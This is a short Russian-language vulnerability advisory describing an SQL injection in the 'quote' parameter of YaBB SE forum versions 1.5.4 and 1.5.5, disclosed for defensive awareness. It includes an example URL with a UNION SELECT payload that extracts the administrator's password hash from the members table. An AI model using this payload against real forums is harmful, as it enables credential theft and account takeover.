Security Lab

SQL инъекция в YaBB SE форуме

Дата публикации:18.02.2004
Всего просмотров:2344
Опасность:
Высокая
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Уязвимые версии: YaBB SE 1.5.4, 1.5.5; и возможно более ранние версии

Описание: Уязвимость в проверке правильности входных данных обнаружена в YaBB SE в 'post.php' файле. Удаленный авторизованный пользователь может внедрить SQL команды.

Уязвимость обнаружена в параметре 'quote'. Удаленный авторизованный пользователь может представить специально обработанный URL, чтобы выполнить произвольные SQL команды на основной базе данных. Пример:

http://localhost:8080/yabbse//inde
x.php?board=1;sesc=13a478d8aa161c2231e6d3b36b6d19f2;action=post;threadid=1;title=Post+reply;
quote=-12)+UNION+SELECT+passwd,null,null,null,null,null,null,null,null+FROM+ yabbse_members+where+ID_MEMBER=1/*

URL производителя:http://www.yabbse.org/

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.